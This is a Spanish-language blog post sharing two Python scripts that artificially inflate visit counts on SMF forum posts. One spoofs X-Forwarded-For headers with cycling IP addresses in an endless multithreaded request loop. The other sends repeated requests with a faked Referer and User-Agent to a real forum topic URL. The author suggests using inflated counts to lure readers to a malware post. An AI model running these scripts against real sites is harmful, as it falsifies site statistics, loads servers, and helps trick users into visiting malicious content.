This page looks best with JavaScript enabled

SMF Incorrect Flood Filter Headers by HielaSangre y Once

 ·   ·   2 min read

La siguiente entrada tal como lo dice el titulo viene de la manao de HielaSangre un viejo conocido amigo no se si decirlo asi, mejor lo dearemos como conocido es que le tengo miedito :3.

Pero ya enserio lo que hace el script realizado por Daniel es incrementar las visitas a una entrada, específicamente de ser dañina no lo es como lo dice el autor pero para andar juegando un ratito sirve y no solo eso, que tal si damos un post de un malware al ver tantas visitas alguien caera, solo digo ;).

Como dice Daniel: Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria… Lo cual al menos, resulta divertido.

#!/usr/bin/python  
\# RemoteExecution  
#Autor: Daniel Godoy A.K.A hielasangre  
   
import sys, threading, time, urllib2,re  
print "Ingrese URL: "  
url = raw\_input()  
a = b = c = d = 1  
count = 0  
class SMFPwner(threading.Thread):  
  def \_\_init\_\_(self, num):  
      threading.Thread.\_\_init\_\_(self)  
      self.num = num        
  def run(self):  
    while 1:  
        global a,b,c,d,count, url  
        data = ""  
        while 1:  
            while 1:  
                if d!=250:  
                    d+=1  
                else:  
                    if c!= 250:  
                        c+=2  
                        d=0  
                    else:  
                        if b!=250:  
                            c=0  
                            d=0  
                            b+=1  
                        else:  
                            a+=1  
                            b=0  
                            c=0  
                            d=0  
                head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)  
                headers = { 'X-Forwarded-For' : head }  
                req = urllib2.Request(url, data, headers)  
                f = urllib2.urlopen(req)  
                count += 1  
                print "\[ Visitando => " + url + " Por " + str(count) +" vez \]"  
for i in range(3):        
        ta = SMFPwner(i)  
        ta.start()

Editado: 23 de Agosto del 2014

Si el título fue cambiado debido a que siguiendo el hilo del foro en Underc0de, Eleven ahora Once, dio a conocer otra forma de realizar este flood espero les agrade :)

import time  
    import urllib2  
       
       
    class Pvisits(object):  
        def \_\_init\_\_(self, url, nvisitas, delay=0):  
            headers = {  
                "Referer": url,  
                "User-Agent": "Opera/9.80 (X11; Linux x86\_64; U; pl) Presto/2.7.62 Version/11.00",  
            }  
         
            for x in xrange(nvisitas):  
                time.sleep(delay)  
                request = urllib2.Request(url, headers=headers)  
                obj\_web = urllib2.urlopen(request)  
                codigo = obj\_web.code  
                if codigo == 200:  
                    print obj\_web.geturl(), codigo, nvisitas - x  
                elif codigo >= 400:  
                    print "Ocurrio un error:", codigo  
                    return  
       
       
    Pvisits("http://underc0de.org/foro/index.php?topic=22799.0", 20, 0)

Fuente: Remoteexecution & Underc0de

Regards,
Snifer

Share on
Support the author with

Avatar
WRITTEN BY